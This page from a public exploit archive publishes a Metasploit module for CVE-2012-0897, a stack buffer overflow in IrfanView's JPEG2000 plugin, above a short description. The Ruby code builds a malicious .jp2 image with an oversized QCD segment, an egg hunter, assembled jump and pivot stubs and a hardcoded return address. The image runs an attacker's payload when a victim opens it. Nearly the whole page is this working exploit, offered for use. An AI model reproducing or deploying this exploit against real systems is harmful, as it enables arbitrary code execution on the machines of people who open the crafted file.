what you don't know can hurt you

Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow

Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow
Posted Jul 2, 2012
Authored by Parvez Anwar, mr_me, juan vazquez | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow vulnerability in versions 4.3.2.0 and below of Irfanview's JPEG2000.dll plugin. This exploit has been tested on a specific version of irfanview (v4.3.2), although other versions may work also. The vulnerability is triggered via parsing an invalid qcd chunk structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon and drag/drop the file into Irfanview\'s window. An egg hunter is used for stability.

tags | exploit, overflow
advisories | CVE-2012-0897, OSVDB-78333
MD5 | ac999f1315054da78d784401745cfa8e

Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
tested on a specific version of irfanview (v4.3.2), although other versions may
work also. The vulnerability is triggered via parsing an invalid qcd chunk
structure and specifying a malformed qcd size and data.

Payload delivery and vulnerability trigger can be executed in multiple ways.
The user can double click the file, use the file dialog, open via the icon
and drag/drop the file into Irfanview\'s window. An egg hunter is used for
stability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery
'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu
'juan vazquez' # more improvements
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2012-0897' ],
[ 'OSVDB', '78333'],
[ 'BID', '51426' ],
[ 'URL', 'http://www.greyhathacker.net/?p=525' ],
],
'Platform' => [ 'win' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 4000,
'DisableNops' => true,
},
'Targets' =>
[
# push esp; retn [i_view32.exe]
# http://www.oldapps.com/irfanview.php?old_irfanview=7097
# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
],
'DisclosureDate' => 'Jan 16 2012',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
], self.class)
end

# encode our string like unicode except we are not using nulls
def encode_bytes(raw_bytes)
encoded_bytes = ""
0.step(raw_bytes.length-1, 2) { |i|
encoded_bytes << raw_bytes[i+1]
encoded_bytes << raw_bytes[i]
}
return encoded_bytes
end

def exploit
jp2 = ""
jp2 << "\x00\x00\x00\x0c" #
jp2 << "\x6a\x50\x20\x20" # [jP ] <0x6a502020> magic 0xd0a870a,len 12
jp2 << "\x0d\x0a\x87\x0a" #
jp2 << "\x00\x00\x00\x14" #
jp2 << "\x66\x74\x79\x70" #
jp2 << "\x6a\x70\x32\x20" #
jp2 << "\x00\x00\x00\x00" # MinorVersion = 0 = [\0\0\0\0]
jp2 << "\x6a\x70\x32\x20" # Compat = 0x6a703220 = [jp2 ]
jp2 << "\x00\x00\x00\x38" #
jp2 << "\x75\x75\x69\x64" # [uuid] <0x75756964> len 56 data offset 8
jp2 << "\x61\x70\x00\xde\xec\x87" # 56 bytes with start and end tags
jp2 << "\xd5\x11\xb2\xed\x00\x50" #
jp2 << "\x04\x71\xfd\xdc\xd2\x00" #
jp2 << "\x00\x00\x40\x01\x00\x00" #
jp2 << "\x00\x00\x00\x00\x60\x09" #
jp2 << "\x00\x00\x00\x00\x00\x00" #
jp2 << "\x00\x00\x00\x00\x00\x00" #
jp2 << "\x00\x00\x30\x00\x00\x00" #
jp2 << "\x00\x00\x00\x2d" #
jp2 << "\x6a\x70\x32\x68" # [jp2h] <0x6a703268> len 45 data offset 8
jp2 << "\x00\x00\x00\x16" #
jp2 << "\x69\x68\x64\x72" # [ihdr] <0x69686472> len 22 data offset 8
jp2 << "\x00\x00\x00\x0a" # ImageHeight = 10
jp2 << "\x00\x00\x00\x0a" # ImageWidth = 10
jp2 << "\x00\x03" # NumberOfComponents = 3
jp2 << "\x07" # BitsPerComponent = 7
jp2 << "\x07" # Compression = 7
jp2 << "\x01" # Colorspace = 0x1 = unknown
jp2 << "\x00\x00\x00\x00\x0f" #
jp2 << "\x63\x6f\x6c\x72" # [colr] <0x636f6c72> len 15 data offset 8
jp2 << "\x01" # Method = 1
jp2 << "\x00" # Precedence = 0
jp2 << "\x00" # ColorSpaceAproximation = 0
jp2 << "\x00\x00\x00" # EnumeratedColorSpace = 16 = sRGB
jp2 << "\x10\x00\x00\x00\x00" #
jp2 << "\x6a\x70\x32\x63" # [jp2c] <0x6a703263> length 0 data offset 8
jp2 << "\xff\x4f" # <0xff4f=JP2C_SOC> Start of codestream
jp2 << "\xff\x51" # <0xff51=JP2C_SIZ> length 47
jp2 << "\x00\x2f" # 47 bytes
jp2 << "\x00\x00" # Capabilities = 0
jp2 << "\x00\x00\x00\x0a" # GridWidth = 10
jp2 << "\x00\x00\x00\x0a" # GridHeight = 10
jp2 << "\x00\x00\x00\x00" # XImageOffset = 0
jp2 << "\x00\x00\x00\x00" # YImageOffset = 0
jp2 << "\x00\x00\x00\x0a" # TileWidth = 10
jp2 << "\x00\x00\x00\x0a" # TileHeight = 10
jp2 << "\x00\x00\x00\x00" # Xtileoffset = 0
jp2 << "\x00\x00\x00\x00" # Ytileoffset = 0
jp2 << "\x00\x03" # NumberOfComponents = 3
jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
jp2 << "\xff\x52" # <0xff52=JP2C_COD> length 12
jp2 << "\x00\x0c" # 12 bytes
jp2 << "\x00" # codingStyle=0=entropy coder w/o partition
jp2 << "\x00" # ProgressionOrder = 0
jp2 << "\x00\x05" # NumberOfLayers = 0x5
jp2 << "\x01" # MultiComponentTransform=0x1=5/3 reversible
jp2 << "\x05" # DecompLevels = 5
jp2 << "\x04" # CodeBlockWidthExponent=0x4+2 # cbw ->64
jp2 << "\x04" # CodeBlockHeightExponent=0x4+2 # cbh ->64
jp2 << "\x00" # CodeBLockStyle = 0
jp2 << "\x00" # QMIFBankId = 0

eggoptions =
{
:checksum => false,
:eggtag => 'pwnd'
}

hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
qcd_data = ""
qcd_data << make_nops(10)
qcd_data << encode_bytes(hunter)
qcd_data << rand_text_alpha(146)

jmp_hunter = %q{
jmp $-0xad
inc ecx
}

# jump to our egghunter
jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string

qcd_data << encode_bytes(jmp_hunter)
qcd_data << rand_text_alpha(196-qcd_data.length)
qcd_data << encode_bytes([target.ret].pack("V"))

# align ecx and jmp
pivot = %q{
inc ch
jmp ecx
}

pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string

qcd_data << encode_bytes(pivot)
qcd_data << egg

jp2 << "\xff\x5c" # start
jp2 << "\x00\xf5" # arbitrary size to trigger overflow
jp2 << "\x22" # guard
jp2 << qcd_data # malicious code
jp2 << "\xff\x90" # <0xff90=JP2C_SOT>len 10
jp2 << "\x00\x0a" # 10 bytes
jp2 << "\x00\x00\x00\x00\x00\x68\x00\x01"
jp2 << "\xff\x93" # <0xff93=JP2C_SOD> Start of data
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
jp2 << "\x80\x80"
jp2 << "\xff\xd9"

# Create the file
print_status("Creating '#{datastore['FILENAME']}' file...")

file_create(jp2)
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    9 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close